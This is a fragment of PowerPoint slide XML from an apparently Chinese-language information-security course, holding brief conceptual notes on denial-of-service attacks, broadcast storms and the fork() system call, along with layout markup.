              <a:t>攻击就好比有成千上万个人同时、不间断地拨打您的电话，此时您朋友的重要电话也就打不进来。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CBFE4DFC-C6C0-4324-B543-DCD78846A7C0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>156</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269853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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{54B90720-33B4-448E-A3A4-97DF6768709D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126980" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Erban9-20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28444592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158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286895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4B6B766-DC2E-4E0B-B394-CC3585DCFE03}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="120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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1543026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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  程序分歧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>fork()    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  fork()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会产生一个与父程序相同的子程序，唯一不同之处在於其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>process id(pid)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  如果我们要撰写守护神程序，或是例如网路伺服器，需要多个行程来同时提供多个连线，可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>fork()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来产生多个相同的行程。</a:t>
            </a:r>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DE3C6AF-E3C2-4830-B2A5-7F1AB7CB1C3D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>159</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1695164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计算机系统配置不当可能造成系统运行不正常，甚至根本不能运行。攻击者通过改变或者破坏系统的配置信息，阻止其他合法用户使用计算机网络提供的服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>沙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9-19</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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96B642-1445-4BC3-A734-A6086FBC8BCA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>160</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9674593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一个简单的攻击类型是广播风暴。攻击者可以生成这样一个消息，它将指示每一个收到数据报的主机回答或者重发这个消息。结果网络饱和，并且不能使用。广播风暴很少是由故意的攻击所致，它通常是由于硬件或者软件的缘故，例如，正在开发之中，存在错误或者没有正确地安装。</a:t>
            </a:r>
          </a:p>
          <a:p>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0532FC-BA39-49D9-AD5E-CF6D056C6DB2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>163</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717241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C8389D-8ECC-4384-8D03-07BA92C5DA07}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B060402020202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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17672027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6975898-C061-48FB-B864-A7EC22E2C2ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368642" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368643"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7254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D1938ABF-D8D1-4E5F-92C1-AA8BCC6C8FAD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" fontAlgn="base" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>171</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18"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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>清</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-3-2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25604954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E724B8A7-FA3C-4521-B3D1-E66C7723A584}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" fontAlgn="base" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>172</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539"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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19650489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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9F5E30AE-0CAE-40C6-B94D-FDE64C77FC21}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>受影响的系统：大多数操作系统和路由器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39943775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E57A7BC-F5ED-44A8-AF5B-F6A08FC381B5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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152088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485832-C2C7-456A-9BD8-EDDAA9E9A8DD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4161815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008"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en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2" descr="D:\my thesis\dissertation\final\LOGO.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="57726" y="48500"/>
            <a:ext cx="2786082" cy="788212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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42910" y="142852"/>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74660" y="1543027"/>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7060" y="1543027"/>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1C27503C-9669-4E2B-AC65-B26F3136F412}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"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endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="36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灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1383619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reeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="0"/>
            <a:ext cx="54102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 fmla="*/ 0 w 6477000"/>
              <a:gd name="connsiteY0" fmla="*/ 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533400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6477000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467475" y="533400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466725" y="523875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="AD403D"/>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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="219DC9"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="2492990" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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rPr>
              <a:t>网络时代的信息安全</a:t>
            </a:r>
            <a:endParaRPr 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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="0"/>
            <a:ext cx="67056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 fmla="*/ 0 w 6477000"/>
              <a:gd name="connsiteY0" fmla="*/ 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533400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6477000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467475" y="533400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466725" y="523875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1D1C9A">
              <a:alpha val="54000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="42A3DE"/>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13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6740016" y="-14288"/>
            <a:ext cx="2408746" cy="547688"/>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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1412776"/>
            <a:ext cx="8229600" cy="4713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774032" y="0"/>
            <a:ext cx="3886200" cy="533400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本占位符 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="692696"/>
            <a:ext cx="8227051" cy="648072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BCCA75C2-4895-46C0-B0A2-1B0B612A7675}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1835323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781800" y="6324600"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{817F96ED-DF47-458A-9890-E98408F2CE6E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61518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日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6727825" y="6407150"/>
            <a:ext cx="1919288" cy="366713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
